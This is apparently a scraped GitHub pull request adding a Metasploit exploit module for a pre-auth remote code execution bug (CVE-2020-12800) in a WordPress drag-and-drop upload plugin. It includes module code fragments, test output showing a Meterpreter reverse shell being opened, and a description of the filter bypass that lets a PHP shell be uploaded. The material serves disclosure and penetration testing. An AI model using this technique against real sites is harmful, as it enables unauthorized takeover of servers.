-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Drag and Drop Multiple File Upload – Contact Form 7 pre-auth RCE CVE-2020-12800 #13545
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
git mv documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.rb documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.md
find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name) | ||
# lastly, if we have a location found, trigger it | ||
if @payload_location |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
See comments about find_payload
and checking the return value. I haven't looked into how/why you're using recursive searching, but you may need to check the @payload_location
variable rather than the return value. It would be nice if the operator received some output if @payload_location
is nil
, rather than failing silently.
documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.md
Outdated
Show resolved
Hide resolved
Hey @h00die, did you happen to make the requested changes locally? I'm not seeing any additional commits past the file name change. |
yup, i haven't had a chance to push them up yet, or get to the ones I didn't mark as resolved yet |
pushed up what i've gotten to |
I've tested with Wordpress Did a manual setup on Ubuntu if that's helpful.
|
Did you install Contact Form 7 and enable it? Typically that's the case |
Oops, I clearly need to read more carefully. Was confused by the name of the plugin. Working now, thanks! |
unless res | ||
fail_with(Failure::Unreachable, 'No server response') | ||
end | ||
|
||
# dont need to check for 200, since that would have triggered our payload | ||
if res.code != 200 | ||
print_status('Bruteforcing for payload to trigger') | ||
find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name) | ||
unless @payload_location | ||
fail_with(Failure::Unknown, 'Unable to determine uploaded shell path') | ||
end | ||
# lastly, if we have a location found, trigger it | ||
send_request_cgi('uri' => @payload_location) | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Tested with the latest changes and kept getting this output:
msf5 exploit(multi/http/wp_dnd_mul_file_rce) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Nonce: 739944da12
[+] Payload uploaded successfully
[*] Attempting to trigger at well known location
[*] Sending stage (38288 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:36722) at 2020-06-04 09:35:43 -0500
[+] Deleted 6rcEb4C8ivQI.php
[-] Exploit aborted due to failure: unreachable: No server response
[*] Exploit completed, but no session was created.
A valid session is still established, but the response is not returning back. Wrapping the highlighted logic in an unless session_created?...end
block fixes this. I can go ahead and make that change while landing, as the rest of the code looks fine to me.
No issues on my side with that approach |
Test output for Wordpress
|
Release NotesThis adds an exploit module for the Drag and Drop Multiple File Upload - Contact Form 7 plugin for Wordpress. For versions below 1.3.4, the file upload security filter can be bypassed by appending a |
Hi, I am trying this exploit module with wordpress 5.4, drag-and-drop plugin 1.3.3.2 and Contact form plugin 7 version 5.1.9. Both these plugins are activated. Yet while executing the module, the error I am getting is ] Getting nonce Can someone tell me what mistake I am doing. |
Check your uri is set correctly |
I checked it. It is /wordpress5.4. This is my uri. I tried it in both linux and wondows targets. The result is same. |
With out httptrace it's hard to tell about that specific configuration |
Here's my httptrace output msf5 exploit(multi/http/wp_dnd_mul_file_rce) > exploit [] Started reverse TCP handler on 192.168.36.132:4444 Request:#################### #################### Response:#################### Moved PermanentlyThe document has moved here. [-] Exploit aborted due to failure: unexpected-reply: Non-200 response, check targeturi |
set URI to Anything else, send me a message on slack to further help. |
Adds a pre-auth RCE for Wordpress with Drag and Drop Multiple File Upload – Contact Form 7 installed.
Pretty straight forward exploit, append a
%
on the file extension to bypass the filter, upload a php shell, call it, and call it a day.@amartinsec wrote in his POC a recursive folder searcher to find the shellcode. I asked them about this, and they mentioned that while there is most likely a known location for the shell, its possible that older versions may have saved files elsewhere. So we trigger the known location, and if no shell is found we backup to the recursive search.
based on the work of @amartinsec
Verification
install vuln plugin (mega link provided) and Contact Form 7 (get it from the wordpress plugin store/search).
msfconsole
use exploits/multi/http/wp_dnd_mul_file_rce
set rhosts [ip]